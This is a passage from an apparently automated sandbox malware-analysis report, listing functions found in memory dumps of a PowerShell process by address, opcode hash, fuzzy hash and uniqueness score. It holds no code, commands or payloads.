                                        • Instruction ID: 6414f6ef167f70d5496fca6f3b55effbf0903df40645a8419d4252326c154874
                                        • Opcode Fuzzy Hash: fe68f67f06321ccdd0704b6d201deae8d49046920c72aa8fcc55da27376ddcf7
                                        • Instruction Fuzzy Hash: CC21BC71500240EFCB09DF54DA80F26BB66FB88318F24C5BDE9095A256C73BD857CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F39110 Relevance: .1, Instructions: 73COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6df5b4ca650c34a892284e53a585c0f96b6b56a446383bb33a66d5ee4fc54599
                                        • Instruction ID: 3c3624a02b963f6b0ecb7d6691de83e62a32d8f9bf12b7c34794e094fb394402
                                        • Opcode Fuzzy Hash: 6df5b4ca650c34a892284e53a585c0f96b6b56a446383bb33a66d5ee4fc54599
                                        • Instruction Fuzzy Hash: 6631A071D057449FEB60CF6AD08878AFBF2EF89320F28C05DD44DA7205C6B5A8818B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F39120 Relevance: .1, Instructions: 69COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8e9642eb06387d534b788db7aa184101f803a23046dc1363f548d797ff6f14c6
                                        • Instruction ID: 29a6b15e45c88710f29246a30fc18e6e24d31c43c94da8107d0b39588527999b
                                        • Opcode Fuzzy Hash: 8e9642eb06387d534b788db7aa184101f803a23046dc1363f548d797ff6f14c6
                                        • Instruction Fuzzy Hash: 97217E71D057449EEB60DF6AD08878AFBF2EB88324F28C01ED45DA7205C6B568818B54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3DC4C Relevance: .1, Instructions: 64COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: acb5eb44424aa7bfb63221cfe9e95a55781f3dd728932bd9bfa9a6380d9d33fc
                                        • Instruction ID: d23e9868a2b6d4272a859e3bfa2d84a4a657583d69ee4b2f6b275003ee912a8a
                                        • Opcode Fuzzy Hash: acb5eb44424aa7bfb63221cfe9e95a55781f3dd728932bd9bfa9a6380d9d33fc
                                        • Instruction Fuzzy Hash: 5911E97245E7E04FD717AB3C98711D13FA09E5722571A40EBC0C48E2B7D658884AC76A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00ECF36B Relevance: .1, Instructions: 57COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction ID: 72a32d91737d2033d0a7fdbb9d9a7ba5b5a72f1ec31c3db91006443cae13b085
                                        • Opcode Fuzzy Hash: ac59097383679d3c36945f3a55f47b1b34a77431d90e23eb4db771cfbaa4427a
                                        • Instruction Fuzzy Hash: C0216A76504240DFCB0ACF50DAC4B16BF62FB58318F24C5ADD9094A256C33AD86ACB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3BA08 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c10b3fca64842a9c5caa447449d1361af2ae7a61c2f2055a22928a625e387dff
                                        • Instruction ID: 2ff535742e6d37869e45a9bcb50d8c6d18e703344396cb7467adb8d66ae1b59c
                                        • Opcode Fuzzy Hash: c10b3fca64842a9c5caa447449d1361af2ae7a61c2f2055a22928a625e387dff
                                        • Instruction Fuzzy Hash: 9A01C0316087849FC729CB35D4A4A5A7FE5EF45220F1484AEE58AC76A2DB34EC41C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3DBD0 Relevance: .0, Instructions: 48COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7817d445951c7531d8f781c64c84c1eb7d5bdea17f37a2899954da1922e3eb2
                                        • Instruction ID: 0b1dab884f17dc85aa3c8131836a19c8ba8a42918d816b96cc12d27580f15085
                                        • Opcode Fuzzy Hash: d7817d445951c7531d8f781c64c84c1eb7d5bdea17f37a2899954da1922e3eb2
                                        • Instruction Fuzzy Hash: 9311F3342057508FC728DF79D08099ABBF6AF8921572089ADD48A8BBA0CB32F845CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00ECD005 Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 50f58f29b01cfd7b0d46441261f0d71c8dbd8d7a0c367f72da63fae786a836ac
                                        • Instruction ID: 07561aa71f51d3ef0cc0dabbfcd1941fc2b87ab4c11fcffb2ba99f9f0b9f35bc
                                        • Opcode Fuzzy Hash: 50f58f29b01cfd7b0d46441261f0d71c8dbd8d7a0c367f72da63fae786a836ac
                                        • Instruction Fuzzy Hash: 9C012D6200E3C09ED7128B258D94B52BFB4DF53224F1981DBD9889F1A3C26A5849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00ECD01D Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c6beb9dfe64812935b30b29dc0839a0d2b494eaca4655f988c4ddee67c1d3f05
                                        • Instruction ID: 439a04e0baffb8e95b45d9181295deee66b390b20c0039f7084cda392f76c941
                                        • Opcode Fuzzy Hash: c6beb9dfe64812935b30b29dc0839a0d2b494eaca4655f988c4ddee67c1d3f05
                                        • Instruction Fuzzy Hash: 6501F73110C3009AE7104A2DCE85F67BF98DF41324F18C53DED485A246C27B9C43D6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38DF7 Relevance: .0, Instructions: 39COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d9619008ae6780712637df7252b24fc8d68f032c9a35586daa84b5c42041c677
                                        • Instruction ID: 7ab26a9c53dcaa3f3c5516b0d1d7676ea71b5b39cf619444a340e88383dee18f
                                        • Opcode Fuzzy Hash: d9619008ae6780712637df7252b24fc8d68f032c9a35586daa84b5c42041c677
                                        • Instruction Fuzzy Hash: 37F0F9746082404FD7029B38D0547EB7FB1DFC2365F2441AED4059B243CD391807C7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00ECD9A7 Relevance: .0, Instructions: 37COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f90094b0ed6d5916af0c476ded8688b202d2b92cbfc515b55617392ec5260f84
                                        • Instruction ID: aa8342801a3425af0438e82ee255b668745f3c08c8e0f34c9beb8d0a90f2467e
                                        • Opcode Fuzzy Hash: f90094b0ed6d5916af0c476ded8688b202d2b92cbfc515b55617392ec5260f84
                                        • Instruction Fuzzy Hash: 50F0F976200604AF97208F0ADD85C63FBADEBD4770719C56AEC4A5B611C672FC42CEA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3D920 Relevance: .0, Instructions: 35COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b4dd1ae794c6e82791c763f7e0f3436f0c6e952dec4106c6647726a7a33ac077
                                        • Instruction ID: b5fde43347baeebbed5ca6004ef3dff9717d807fcecb9da002050fbbe1caba19
                                        • Opcode Fuzzy Hash: b4dd1ae794c6e82791c763f7e0f3436f0c6e952dec4106c6647726a7a33ac077
                                        • Instruction Fuzzy Hash: C1F03A357092818FC3158B6CD4689A67FF69FCB62175A00EAE084DB362CA21DC01DB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37640 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 08041e76e55421524ba80ace27a8f0e0ce137c32906b45a000aac02e78fca5ad
                                        • Instruction ID: 6a4d41eeb766969ef52da4ccc50e90079d41eb5667eecb777f1ff02b1be6b726
                                        • Opcode Fuzzy Hash: 08041e76e55421524ba80ace27a8f0e0ce137c32906b45a000aac02e78fca5ad
                                        • Instruction Fuzzy Hash: 12F02B727046109FC715AB68D854A2E77E9FB89231B01082EE04AD7291CF349C028751
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F37650 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c59a0aecfc803d261c8bf3733bd20650b3117b1b0e398b2316addc3f21009110
                                        • Instruction ID: 114d3e710fdec7a280d4e1a5a55ab81a6f0b8df9d3791de4d4fab4c0c835a53b
                                        • Opcode Fuzzy Hash: c59a0aecfc803d261c8bf3733bd20650b3117b1b0e398b2316addc3f21009110
                                        • Instruction Fuzzy Hash: 42F0A0727006159FCB10AB69E884A6FB7EDEB89731B01092DE04AD3391DF35AC4687A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00ECD998 Relevance: .0, Instructions: 33COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754097625.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_ecd000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e602cd9249bab3133329b478a024c57bc56265c2904d3653128b67d5dd9bfcb
                                        • Instruction ID: 06306b08531b305d843d8a9c17fbcb4981d9e68148d3d92d19945253d9380f23
                                        • Opcode Fuzzy Hash: 1e602cd9249bab3133329b478a024c57bc56265c2904d3653128b67d5dd9bfcb
                                        • Instruction Fuzzy Hash: B2F03C75104640AFD7118F06CD84D23BBA9EB85620B198499A8495B312C671FC42CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38668 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fefb18fec6e5ab61cce9d602100b26b1c04bb7d923550d1e6deeba3f73726cd7
                                        • Instruction ID: d4d76dc36e2d32b8fb98b596bc22023d784948ea7fcd31800577180f49279bdb
                                        • Opcode Fuzzy Hash: fefb18fec6e5ab61cce9d602100b26b1c04bb7d923550d1e6deeba3f73726cd7
                                        • Instruction Fuzzy Hash: 5BF0E2353082808FCB0AA774642C1BE7FB1DFD6335B2400AEE04587243CE2509468785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38E78 Relevance: .0, Instructions: 32COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0846d5f7756ae0c5d7e6c7f7c7fb0efb4759bd6030540380db3872d07c14bfc5
                                        • Instruction ID: 09afa6629eb7ec1de588d2a186e1f3d130f701232474e07d1d44f6f1872151f5
                                        • Opcode Fuzzy Hash: 0846d5f7756ae0c5d7e6c7f7c7fb0efb4759bd6030540380db3872d07c14bfc5
                                        • Instruction Fuzzy Hash: 0EF090309093404FC716DB74D49979A7FF0EF06310F2444AEE04EDB252CB3A5986CB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38E08 Relevance: .0, Instructions: 31COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 260a2d8a8498a1eda0bb97c7450c256462e5a1a08d0562f8425ad1984a7c672b
                                        • Instruction ID: c4217aa23710914e8ac78b8e1396bb9b68a51f1a23e7aa0505b58c14a3244784
                                        • Opcode Fuzzy Hash: 260a2d8a8498a1eda0bb97c7450c256462e5a1a08d0562f8425ad1984a7c672b
                                        • Instruction Fuzzy Hash: 46F0E2756042144BD704AB64D0197AF77E6EBC0769F20812DE80957385CE3E2906C7E1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3D7C0 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de1f1235c3b8370654cd7a592c0b5f469e4f0f2939b2485cf0671dcea9fb3e7c
                                        • Instruction ID: a00b59f2e3cfc1320398526ed699cf9a18d8ea5415cc31eeadd5d393e15ba14d
                                        • Opcode Fuzzy Hash: de1f1235c3b8370654cd7a592c0b5f469e4f0f2939b2485cf0671dcea9fb3e7c
                                        • Instruction Fuzzy Hash: 2FF02B32A040806BDB04C6B9E4516EDBF71DFCA330F2484BFC84A97301CA23090AAB54
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3D930 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a940c6b40c81860435347899e7468942e448a6ba22e713f0112603d3896853b9
                                        • Instruction ID: 0dec1ea3c3389f3bb2af8a02eff0849526bf9db2d1d58625ba13dcd911b796fd
                                        • Opcode Fuzzy Hash: a940c6b40c81860435347899e7468942e448a6ba22e713f0112603d3896853b9
                                        • Instruction Fuzzy Hash: 51E065397001118F83109B1DE498D2ABBFAEFCEB3171900AAE589DB321CA61EC01CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3D770 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4abdb266c8ef35209eac5c945035528571a27704257079d124851050351c5612
                                        • Instruction ID: f816cde8299283bf525aa9954129b0c272a34aa9ff10527449e9727635927bb0
                                        • Opcode Fuzzy Hash: 4abdb266c8ef35209eac5c945035528571a27704257079d124851050351c5612
                                        • Instruction Fuzzy Hash: B7E0ED323497900BC313522DB81490E7FAAEFC6271B1880AFE059DB252DE699C0593A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F32C06 Relevance: .0, Instructions: 29COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56f127a62a7fd603a74672a67d6c8c2411e651d99f4b439aa59503bcdc6dc833
                                        • Instruction ID: a509fb821e54bea5f15947802d6cea85316fdde3c2e831880a0e2b955c19e30a
                                        • Opcode Fuzzy Hash: 56f127a62a7fd603a74672a67d6c8c2411e651d99f4b439aa59503bcdc6dc833
                                        • Instruction Fuzzy Hash: 64F0D435A001099FCB15CF9DD990AEEF7B1FF88324F208159E515A73A1C736AC52CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F39261 Relevance: .0, Instructions: 28COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5ddd4dabcf199dd28bba48741fd6aae37dc30b590cb14913dc0eb9a788583093
                                        • Instruction ID: fa95349c27778f65193e5d3b434d415cde7824a366de4a079e9faa06dd226708
                                        • Opcode Fuzzy Hash: 5ddd4dabcf199dd28bba48741fd6aae37dc30b590cb14913dc0eb9a788583093
                                        • Instruction Fuzzy Hash: AFE092327183511F971556A958116777BAA8EC62B1B0500A6F944CB243DD88CC1253F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3ACB0 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 947ead5d3face3f420fad2fbab64a5adafe971a70264c7abb0f4c9255f124966
                                        • Instruction ID: 43937f7722f7fb4530f930fbb1ab41c4b374c2d7990251ef0c88fcbf7b451c69
                                        • Opcode Fuzzy Hash: 947ead5d3face3f420fad2fbab64a5adafe971a70264c7abb0f4c9255f124966
                                        • Instruction Fuzzy Hash: 14E04F6170D2D40F871A927E64209A72FA74AC717031A81FEE489CF217C8018C06936A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38E88 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb89f2595013f14bc1c1fcdb573948a1854a768f7c2a1e11096ebf3c5c1de2bd
                                        • Instruction ID: 4bf044792e12c7862d007c2d4ac7f45bfdf3ada2f6456795813e6112fb06a5ce
                                        • Opcode Fuzzy Hash: cb89f2595013f14bc1c1fcdb573948a1854a768f7c2a1e11096ebf3c5c1de2bd
                                        • Instruction Fuzzy Hash: B2F039709003148BD764DBB8E49C7AABBE5EB44360F20442DE54ED3241DF3A69858B90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38678 Relevance: .0, Instructions: 24COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3619a4bbe9f5b83cd1102b24242f0a962c1e0d0d1238a50afeadd9d24baca528
                                        • Instruction ID: 3a7aa9c48a30d464ab869afe0b8ca24b59cb983b12ec519b678241d493117f05
                                        • Opcode Fuzzy Hash: 3619a4bbe9f5b83cd1102b24242f0a962c1e0d0d1238a50afeadd9d24baca528
                                        • Instruction Fuzzy Hash: DDE0DF3130421887CF09A774A41C2AEBAA6EBC4725F20002EF60A83343CF69094283D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F39270 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c586cb3d730601dba9143ae22e25a3539979efda1d371600366a945c8c63ac5
                                        • Instruction ID: d4357217ac2fc9d94341d8f35273676a0b4b2c63f68b5f13bfb3a14a5158aa7b
                                        • Opcode Fuzzy Hash: 0c586cb3d730601dba9143ae22e25a3539979efda1d371600366a945c8c63ac5
                                        • Instruction Fuzzy Hash: D2D05E2271832617065421EA2D1177BB2CE8EC96F1F450036BA08C7242EC8CCC1323F6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3D7D0 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 82c060711b0c7f7bb1d51f47cc72c04db49e830a27a056df87a4374f1fa0fe62
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: FBE08632B04014A7CB089599E4115D9F7A9DBCC320F14847BD90AA7340DA32691697D1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3D780 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8533acc84b85022cdc1d5730872610ca3e19e77c89d822ee4771be79e3ee5c1
                                        • Instruction ID: 6bc466131ce2e59ce77399a37a59e1023d5dd78bb1829f4a46ab50bf9988e730
                                        • Opcode Fuzzy Hash: b8533acc84b85022cdc1d5730872610ca3e19e77c89d822ee4771be79e3ee5c1
                                        • Instruction Fuzzy Hash: 2DE0C232740A144B8716662EB81485FB7EAEFC4771364843EE02AC7305DE64DD0647D6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38439 Relevance: .0, Instructions: 21COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 84ee6796e9658836fe8e85b27eebef6dfb809a75690f3a545251e7a3681ed1d3
                                        • Instruction ID: 6072c1193f6cd62f93b8a2455eff6e053fcbec1cbae53e5690123241d733cd9f
                                        • Opcode Fuzzy Hash: 84ee6796e9658836fe8e85b27eebef6dfb809a75690f3a545251e7a3681ed1d3
                                        • Instruction Fuzzy Hash: 28E06D318092C9CBCF0AEB74E05A4ED7F70EA26310F2405DDE59246452DA250586CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F3FBD8 Relevance: .0, Instructions: 20COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 966cbbdc24ab3e7009bead0d3e8ba72843a91bd68574f6d9795c9071ba8661a4
                                        • Instruction ID: 7a5193c82eaec22b97f93198a91067f530920d17706d9f7d11309149b270f165
                                        • Opcode Fuzzy Hash: 966cbbdc24ab3e7009bead0d3e8ba72843a91bd68574f6d9795c9071ba8661a4
                                        • Instruction Fuzzy Hash: 0DE01A70D052498F8740DFA8DA0156FBFF0AB09214B2485AE885CE7212E37186128B81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00F38501 Relevance: .0, Instructions: 19COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.1754285357.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_f30000_powershell.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c5e97f1ae74d659f622603ba582a00484ed47904292cde1d62007aa6007a8276
                                        • Instruction ID: 20e1894436db21031477129d2c405802fde5558472a7d6bdfb749c9294d31789
                                        • Opcode Fuzzy Hash: c5e97f1ae74d659f622603ba582a00484ed47904292cde1d62007aa6007a8276
                                        • Instruction Fuzzy Hash: 5CE0DF30904209CFCB48DF64E54B42ABFB0EB45310B20445DE94487312EB301C40CBC0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

